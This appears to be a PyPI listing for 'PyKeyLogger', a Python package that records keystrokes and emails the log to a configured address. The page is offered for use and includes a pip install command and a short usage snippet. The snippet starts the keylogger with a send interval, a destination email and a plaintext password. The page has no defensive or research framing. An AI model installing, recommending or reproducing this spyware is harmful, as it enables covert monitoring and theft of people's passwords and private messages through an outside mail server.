Skip to main content

No project description provided

Project description

# A simple keylogger

#### This is a simple keylogger that is built using the libraries: pynput and stmplib, #### and some other built-in modules for sending emails. #### It will record the key and send the log to you through email

## How to install it?

You can do:

“”” pip install Pykeylogger “””

to install pykeylogger…

## How to use it?

code example:

“”” from Pykeylogger import keylogger

logger = keylogger.KeyLogger(interval=50, email=”pykeylogger@pykeylogger.com”, passwd=”Pykeylogger123”) logger.run() “””

simple! interval = how long do you want to wait to send the log of the keys to you email = the email you want to send to log to passwd = password of the email

yeyeyeye! Thank you!

Project details


Release history Release notifications | RSS feed

This version

1.0

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

PyKeyLogger-1.0.tar.gz (1.1 kB view hashes)

Uploaded Source

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page